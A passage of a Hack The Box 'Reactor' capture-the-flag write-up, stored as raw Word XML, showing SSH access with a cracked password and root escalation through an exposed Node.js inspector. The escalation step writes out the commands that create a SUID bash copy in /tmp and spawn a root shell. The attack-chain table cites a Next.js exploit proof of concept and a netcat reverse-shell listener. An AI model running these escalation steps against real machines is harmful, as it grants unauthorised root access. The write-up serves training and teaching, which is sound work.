          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 7: SSH Access &amp; User Flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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ssh engineer@&lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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Password: reactor1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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cat ~/user.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="EAFAF1" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E8449"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">USER FLAG: 77d0187142e6231255eb999221722fb05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922B21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 8: Privilege Escalation — Node.js Inspector</w:t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Step 1 — Find root processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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ps aux | grep node</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key finding:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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root  1416  /usr/bin/node --inspect=127.0.0.1:9229 /opt/uptime-monitor/worker.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A root-owned Node.js process has the V8 Inspector (Chrome DevTools Protocol) enabled on localhost port 9229. Any JavaScript executed through it runs with root privileges.</w:t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Step 2 — Verify inspector is accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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curl -s http://127.0.0.1:9229/json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Returns JSON with the WebSocket debugger URL, confirming the inspector is reachable.</w:t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Step 3 — Connect with built-in Node inspector client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEF9E7" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D35400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D35400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NO SSH tunnel needed! Node.js v20+ has a built-in inspector client.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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node inspect 127.0.0.1:9229</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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connecting to 127.0.0.1:9229 ... ok</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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debug&gt;</w:t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Step 4 — Verify root execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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debug&gt; exec("process.getuid()")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Returns: 0  (we are root!)</w:t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Step 5 — Copy bash and set SUID bit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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debug&gt; exec("process.mainModule.require('child_process').execSync('cp /bin/bash /tmp/r00t &amp;&amp; chmod +s /tmp/r00t').toString()")</w:t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Step 6 — Exit debugger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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.exit</w:t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Step 7 — Spawn root shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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/tmp/r00t -p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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root</w:t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Step 8 — Read root flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:right="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="EAFAF1" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E8449"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ROOT FLAG: &lt;your root flag here&gt;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922B21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Attack Chain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000"/>
        <w:gridCol w:w="3000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:shd w:fill="922B21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000"/>
            <w:shd w:fill="922B21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000"/>
            <w:shd w:fill="922B21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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="922B21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Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:shd w:fill="2C3E50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shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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nmap -sC -sV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Ports 22, 3000 found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:shd w:fill="2C3E50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shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Web Enum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Browser + Wappalyzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Next.js 15.0.3 identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:shd w:fill="2C3E50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shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Vuln ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Version research</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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CVE-2025-55182 confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:shd w:fill="2C3E50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shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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React2Shell PoC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Shell as node user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:shd w:fill="2C3E50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shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Post-Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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strings reactor.db</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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MD5 hash extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:shd w:fill="2C3E50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shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Hash Cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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john + rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Password: reactor1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:shd w:fill="2C3E50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shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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User Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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SSH as engineer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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user.txt captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:shd w:fill="2C3E50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shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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PrivEsc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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node inspect :9229</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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JS execution as root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:shd w:fill="2C3E50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shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Root Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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/tmp/r00t -p</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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root.txt captured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922B21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-55182 is CVSS 10.0 — always fingerprint Next.js versions during recon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unsalted MD5 hashes are trivially crackable — never store passwords this way</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always run: ps aux | grep node during Linux privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Node.js --inspect on localhost = code execution as that process owner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The built-in "node inspect" client works with no SSH tunnel or extra tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLite databases in web app directories almost always contain credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="922B21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools &amp; References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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="922B21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3000"/>
            <w:shd w:fill="922B21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4000"/>
            <w:shd w:fill="922B21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Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="2C3E50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nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Port scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Built-in Parrot/Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="2C3E50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Wappalyzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Tech fingerprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Browser extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="2C3E50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React2Shell-PoC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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CVE-2025-55182 exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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github.com/jensnesten/React2Shell-PoC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="2C3E50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netcat (nc)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Reverse shell listener</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Built-in</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="2C3E50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john</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Hash cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Built-in Parrot/Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="2C3E50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node inspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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CDP debugger client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Built-in Node.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="2C3E50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CrackStation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Online hash cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">crackstation.net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100" w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E8449"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Machine Pwned!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB Reactor — Easy Linux — Season 11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2026-07-23T21:36:28.513Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-23T21:36:28.525Z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